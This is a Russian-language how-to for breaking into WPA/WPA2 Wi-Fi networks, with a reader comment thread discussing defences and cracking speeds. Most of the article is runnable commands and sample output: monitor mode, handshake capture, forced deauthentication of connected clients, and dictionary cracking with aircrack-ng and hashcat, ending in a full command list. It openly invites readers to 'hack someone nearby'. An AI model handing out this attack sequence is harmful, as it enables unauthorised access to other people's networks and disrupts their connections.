Взлом маршрутизаторов WPA/WPA2 Wi-Fi с помощью Airodump-ng и Aircrack-ng/Hashcat
Это краткое пошаговое руководство, которое демонстрирует способ взлома сетей Wi-Fi, защищённых слабыми паролями. Оно не исчерпывающее, но этой информации должно хватить, чтобы вы протестировали свою собственную сетевую безопасность или взломали кого-нибудь поблизости. Изложенная ниже атака полностью пассивна (только прослушивание, ничего не транслируется с вашего компьютера) и о ней невозможно узнать, если вы только реально не воспользуетесь паролем, который взломали. Необязательную активную атаку с деаутентификацией можно применить для ускорения разведывательного процесса. Она описана в конце статьи.
Если вы знакомы с процессом, можете пропустить описания и сразу перейти к списку команд в конце. Разнообразные предложения и альтернативные методы перечислены в приложении.
ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данное ПО/руководство предназначено только для образовательных целей. Его нельзя использовать для нелегальной активности. Автор не несёт ответственности за его использование. Не будь уродом.
Для начала
Это руководство предполагает, что вы:
- В целом не испытываете проблем с использованием командной строки.
- Работаете в дистрибутиве Linux на базе Debian, желательно Kali linux (пользователям OS X см. приложение).
- У вас установлен Aircrack-ng
-
sudo apt-get install aircrack-ng
-
- Ваша карта беспроводной связи поддерживает режим монитора (см. список совместимых устройств).
Взлом сети Wi-Fi
Режим монитора
Начнём со списка беспроводных интерфейсов, которые поддерживают режим монитора:
airmon-ng
Если вы не видите интерфейсов в списке, то ваша карта не поддерживает режим монитора. :(
Предположим, что название вашего интерфейса wlan0, но используйте настоящее название, если оно отличается от этого. Далее, переведём интерфейс в режим монитора:
airmon-ng start wlan0
Запускаем
iwconfig
. Теперь вы должны увидеть новый интерфейс монитора (скорее всего, mon0
или wlan0mon
).Найти цель
Начните прослушивать трансляцию кадров неисправности окружающих беспроводных маршрутизаторов, используя свой интерфейс монитора:
airodump-ng mon0
Вы должны увидеть примерно такую выдачу.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
Захват 4-стороннего рукопожатия
WPA/WPA2 использует 4-стороннее рукопожатие для аутентификации устройств в сети. Неважно, что это значит, но вам нужно захватить одно из этих рукопожатий, чтобы взломать сетевой пароль. Эти рукопожатия происходят каждый раз, когда устройства подключаются к сети, например, когда ваш сосед возвращается домой с работы. Чтобы перехватить рукопожатие, мы направляем airmon-ng для мониторинга трафика в целевой сети, используя значения канала и bssid, полученные предыдущей командой.
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
Теперь мы ждём… Как только будет захвачено рукопожатие, вы должны увидеть в правом верхнем углу экрана, рядом с текущим временем что-то вроде
[ WPA handshake: bc:d3:c9:ef:d2:67
.Если не терпится и вы согласны на активную атаку, то можете заставить устройства в сети заново соединиться, принудительно разъединив их. Для этого им нужно отправить вредоносные пакеты на деаутентификацию. Это часто приводит к перехвату 4-стороннего рукопожатия. См. раздел об атаке с деаутентификацией ниже.
Как только вы перехватили рукопожатие, нажмите
ctrl-c
для выхода из airodump-ng
. Вы увидите файл .cap
там, где указали airodump-ng
сохранять перехваты (скорее всего, он называется -01.cap
). Мы используем этот файл перехвата для взлома сетевого пароля. Я люблю менять название файла в соответствии с названием сети, которую мы будем взламывать:mv ./-01.cap hackme.cap
Взлом пароля сети
Последний шаг — это взломать пароль, используя перехваченное рукопожатие. Если у вас есть доступ к GPU, настоятельно рекомендую использовать для взлома пароля
hashcat
. Я создал простой инструмент, с помощью которого использовать hashcat очень легко: он называется naive-hashcat
. Если у вас нет доступа к GPU, то можно воспользоваться различными онлайновыми GPU-сервисами для взлома, вроде GPUHASH.me или OnlineHashCrack. Можете также попробовать использовать CPU-брутфорс с помощью Aircrack-ng.Обратите внимание, что оба метода атаки ниже предполагают относительно простой пользовательский пароль. Большинство маршрутизаторов WPA/WPA2 поставляются с сильными 12-значными случайными паролями, которые большинство пользователей оставляют без изменений (и правильно делают). Если пробуете взломать один из таких паролей, рекомендую использовать словарные файлы Probable-Wordlists WPA-length.
Взлом с помощью
naive-hashcat
(рекомендуемый метод) До того, как начать взлом пароля с помощью naive-hashcat, нужно конвертировать наш файл
.cap
в эквивалентный hashcat формат для .hccapx
. Это легко сделать или загрузив файл .cap
на https://hashcat.net/cap2hccapx/, или напрямую используя инструмент cap2hccapx
.cap2hccapx.bin hackme.cap hackme.hccapx
Затем скачиваем и запускаем
naive-hashcat
:# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat использует различные словари, правила, комбинации и маски (умный брутфорс) для проведения атаки. Атака на пароль средней сложности может занять дни или даже месяцы. Взломанный пароль будет сохранён в hackme.pot, так что периодически проверяйте этот файл. Как только пароль взломан, то в
POT_FILE
вы увидите что-то такое:e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Где последние два поля, разделённые
:
представляют собой имя сети и пароль, соответственно.Если предпочитаете использовать
hashcat
без naive-hashcat
, то см. эту страницу.Взлом с Aircrack-ng
Aircrack-ng можно использовать для самых простых словарных атак силами CPU. Перед началом атаки нужно получить список слов. Рекомендую использовать известный словарный файл rockyou:
# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Обратите внимание, что если сетевой пароль отсутствует среди слов в файле, то вы его не взломаете.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
Как только пароль взломан, вы увидите в окне терминала сообщение
KEY FOUND!
, после которого будет указан пароль в текстовом виде. Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Атака с деаутентификацией
Атака с деаутентификацией предполагает отправку поддельных пакетов на деаутентификацию с вашей машины клиенту, подключенному к сети, которую вы пытаетесь взломать. Эти пакеты включают в себя поддельные адреса "sender", так что клиент думает, что они отправлены с настоящих точек доступа. Получив такой пакет, большинство клиентов отключаются от сети и немедленно переподключаются, обеспечивая вам возможность участвовать в 4-стороннем рукопожатии, если вы мониторите с помощью
airodump-ng
.Используйте
airodump-ng
для мониторинга конкретной точки доступа (используя -c channel --bssid MAC
) до тех пор, пока клиент (STATION
) не подключится. Подключенный клиент выглядит примерно так, где 64:BC:0C:48:97:F7
его MAC-адрес: CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS
Теперь оставим
airodump-ng
работать, а сами откроем новое окно консоли. Мы используем команду aireplay-ng
для отправки пакета на деаутентификацию жертве, заставляя его переподключиться к сети, и будем надеяться на рукопожатие.# -0 2 specifies we would like to send 2 deauth packets. Increase this number
# if need be with the risk of noticeably interrupting client network activity
# -a is the MAC of the access point
# -c is the MAC of the client
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
Как вариант, вы можете транслировать пакеты деаутентификации всем клиентам вокруг:
# not all clients respect broadcast deauths though
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0
Как только вы отправили пакеты, возвращайтесь к процессу
airodump-ng
, и при удачном стечении обстоятельств увидите справа вверху: [ WPA handshake: 9C:5C:8E:C9:AB:C0
. Теперь вы перехватили рукопожатие и можно начинать взлом пароля сети.Список команд
Ниже список всех команд, которые нужны для взлома сети WPA/WPA2, по порядку, с минимальным описанием.
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0
# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
########## crack password with aircrack-ng... ##########
# download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap
########## or crack password with naive-hashcat ##########
# convert cap to hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx
# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Приложение
Отзывы на это руководство были такими замечательными, что я добавил советы и дополнительные материалы от участников сообщества в дополнительное приложение. Изучите его, чтобы узнать, как:
- Перехватывать рукопожатия и взламывать пароли WPA на MacOS/OSX
- Перехватывать рукопожатия со всех сетей вокруг с помощью
wlandump-ng
- Использовать
crunch
для генерации на лету словарных списков на 100 ГБ и больше - Подделывать свой MAC-адрес с помощью
macchanger
Авторство
Основная часть информации здесь почерпнута из великолепного руководства Льюиса Энкарнасьона. Спасибо также авторам и мейнтейнерам Aircrack-ng и Hashcat.
Огромная благодарность neal1991 за перевод этого руководства на китайский. Кроме того, благодарим hiteshnayak305, enilfodne, DrinkMoreCodeMore, hivie7510, cprogrammer1994, 0XE4, hartzell, zeeshanu, flennic, bhusang, tversteeg, gpetrousov, crowchirp и Shark0der с Reddit и GitHub, которые тоже помогли советами и исправлением опечаток. Если вам интересно узнать о дополнительных вариантах взлома WPA2, почитайте это обсуждение на Hacker News.
Комментарии (51)
sawork
06.08.2017 09:03Неплохая инструкция, но не хватает описания атаки на WPS, подбор пина и последующие атаки с его помощью…
FreeManOfPeace
06.08.2017 09:03+6В общем то ничего нового, эти мануалы лежат в сети годами, и на всё уже давно написаны скрипты для
школьниковудобства.
Вот если бы была более обширная статья в которой так же были рассмотрены альтернативы aircrack-ng (например взлом WPS через Reaver).
А интереснее всего было бы почитать о запуске того же reaver/aircrack-ng на том же андроид, и про местные альтернативы им.
symbol
06.08.2017 10:03а как от этого защищаться, есть инструкции?
MonkAlex
06.08.2017 10:11+2Элементарные. Не использовать WPA, использовать WPA2 с несловарным паролем.
Croot
06.08.2017 11:05-2Лишним не будет настроить фильтр по MAC адресу, на тот случай если каким-то чудом пароль таки подберут.
omgiafs
06.08.2017 11:24+1Гораздо веселее накостылить скрипт который будет с помощью inotifywait мониторить файл с dhcp-leases и, если MAC не в белом списке, слать уведомление вам на почту.
Можно, конечно, и более изящно, но это первое, что пришло мне в голову.
Плюс такого метода — вы узнаете, что:
— вашу сеть пытались взломать;
— вашу сеть взломали.
chem_ua
06.08.2017 14:36+8Фильтрация по MAC-адресу это защита от ясельной группы в детском саду.
Подключенные MAC-адреса к роутеру, передаются в открытом виде и что помешает человеку его подменить, когда клиент будет отключен?chelaxe
06.08.2017 21:11можно еще и не ждать когда он отключится, а самому его отключить) по типу «Атака с деаутентификацией» что выше.
chem_ua
06.08.2017 22:00Вы немного не поняли, если вы отключите клиента от точки в которой включена фильтрация по MAC-адресу, Вы все равно не подключитесь с таким же MAC-ом. А вот когда клиент отключен, например пошел спать, никто не помешает подменить MAC-адрес и подключится к точке, а дальше останется добавить свой MAC-адрес в исключения или вообще отключить фильтрацию.
electronus
06.08.2017 22:51Взлом пароля к вайфай не равняется взлому пароля админки роутера
chem_ua
06.08.2017 22:57Это понятно, но учитывая количество уязвимостей роутеров это не такая и большая проблема. Много людей ставят альтернативные прошивки или обновляют существующие? Я Вам отвечу, нет, очень мало.
И не «взлом», а подбор.Dmitry_5
07.08.2017 11:52Разве роутеры не научились еще в 21м веке обновлять прошивку сами?
chem_ua
07.08.2017 18:19И много Вы таких моделей знаете?
Да и не факт что после обновления уязвимость будет закрыта. Учитывая как производители относятся к уведомлениям об уязвимостей у них это «фича».chelaxe
07.08.2017 18:57по этой причине пользуюсь микротиками… и обновления, и отношение, железо и качество, да и софт. Не зря их в народе зовут циска для бедных.
chem_ua
07.08.2017 19:11Ну еще как вариант, взять роутер с хорошей начинкой и прошить OpenWrt.
chelaxe
07.08.2017 20:37Могу порекомендовать UPVEL UR-337N4G. В ситилинке 1.5к стоит. Делал большую сеть на данных девайсах с 4g модемами Huawei E3372 на двух провайдерах. OpenWrt и SoftEther. Получилось крайне надежное решение.
g0rd1as
07.08.2017 20:22То-то обычный запуск RouterScan-а выдает увесистую пачку незащищенных Микротиков! :)
chelaxe
07.08.2017 20:33И кто в этом виноват? Настраивать нужно девайс.
Chupaka
10.08.2017 11:13Как правило, виновата уверенность пользователя в том, что он-то роутер настроит гораздо лучше, чем тот же QuickSet с заводскими шаблонами настроек :) Поэтому сброс настроек в ноль и добавление адресов на WAN/LAN, правила NAT — и вроде уже Интернетики работают, больше ничего лучше не трогать.
g0rd1as
06.08.2017 11:39Ну, вот это бы на всякий случай тоже стоило прописать. А то в РФ, знаете ли, придется еще доказывать, что не верблюд, и дисклеймер сильно не поможет, если за переводчика или автора возьмутся всерьез.
omgiafs
06.08.2017 11:05Просто использовать 12-символьный пароль в сочетании с WPA2+PSK.
Если и сдампят хеш, то на взлом 12-символьного пароля уйдет точно больше недели.
Давайте прикинем. 1017 паролей в секунду ([00:01:49] 111040 keys tested (1017.96 k/s)), 87 868 800 в сутки. 12 символов это дохрениллион комбинаций. Если взять только символы латинского алфавита (строчные + прописные) и цифры, получаем (26+26+10)^12 = 839 299 365 868 340 224 вариантов, на перебор всех потребуется 26 169 133 лет. На перебор 1% комбинаций понадобится 261к лет.akirsanov
06.08.2017 14:32У вас порядок цифр брута для wpa2 далек от реальности: https://www.anachakhacker.com/2016/12/05/hashcat-benchmark-wpa-wpa2-collection/
akirsanov
06.08.2017 14:37Добавлю еще один бенчмарк:
https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a270c40
Hashtype: WPA/WPA2
Speed.Dev.#*.: 3177.6 kH/s
А это уже 3 с лишним миллиона хешей в секунду.
chem_ua
06.08.2017 14:38Не говоря уже про фермы где скорость больше нескольких миллионов хешей в секунду. Понятно что и этого мало, но перебрать быстро по словарю можно.
hunroll
06.08.2017 14:38Ну 1000 паролей в секунду — это если использовать процессор. Уже очень давно на хабре есть серия статей, которая не один раз помогла подобрать пароль к сети
соседей, от которой забыл пароль.
Про ривер есть тут, более чем понятно: Reaver
Про то как использовать ГПУ: Cpyrit, OclHashcat
На мобильной Radeon 7400 получалось около 10к паролей в секунду. На 7970 получалось, вроде, 70к паролей/секунду.
Но да, 12 символов перебирать — пару десятков неплохих ферм нужно. Уж очень это дорого и долго получится.
P.S. Если набросать файлик со всеми датами рождения в «нашем» формате за последние, скажем, 100 лет, то из 10 сетей хоть одна да проскочит) У меня из 20 сетей в зоне нормального покрытия у троих были даты рожденияchem_ua
06.08.2017 14:39Даты рождения, номера мобильных, которые быстро пробиваются по маскам.
chelaxe
06.08.2017 21:17просто цифры 8 штук (многие ставят пароль юзая PIN указанный на обороте роутера)
senglory
08.08.2017 13:29Интересно, а за какое время подберется 20 символьный пароль из одних цифр от 0 до 9?
cloudness
08.08.2017 15:49+110^20=100000000000000000000 — столько вариантов пароль (ну очевидно же, комбинаторика, все дела, да и просто посчитать от 0 до 1 с 20 нулями можно). Поделить на количество паролей в секунду (возьмем, к примеру, 10 тысяч паролей в секунду), итого 10^16 секунд на подбор или 317 миллионов лет. Как бы надежно, но запоминать такую фигню или вводить — дело неблагодарное.
chem_ua
06.08.2017 14:51+3Хеш необратим и использовать термин «взлом» не совсем корректно, в данном случае лучше использовать термин «подбор».
А вообще, на сайте публиковали более подробные статьи на эту тему:
Wi-Fi сети: проникновение и защита. 1) Матчасть
Wi-Fi сети: проникновение и защита. 2) Kali. Скрытие SSID. MAC-фильтрация. WPS
Wi-Fi сети: проникновение и защита. 3) WPA. OpenCL/CUDA. Статистика подбора
konchok
06.08.2017 22:07-2>кадров неисправности
>четырехстороннее рукопожатие
Нетрадиционный перевод прямо скажем.
VBKesha
07.08.2017 16:45Как вариант, вы можете транслировать пакеты деаутентификации всем клиентам вокруг
Как долго идет процесс повторной аутентификации в таком случае?semen-pro
07.08.2017 22:55Если рассылать массово пакеты деаутентификации — все начинают проклинать того «школьника», т.к. вайфай падает, и пользоваться им невозможно. Пишут, что это первый признак попытки взлома.
ivanius
09.08.2017 08:22+2поменял соседям пароли с 88888888 и mykievstar123 на хороший рандом, пошел выдал распечатку и плучил + в карму.
haiflive
Значит ли это что если кого-то будут судить, то можно сослаться на взлом WI-FI?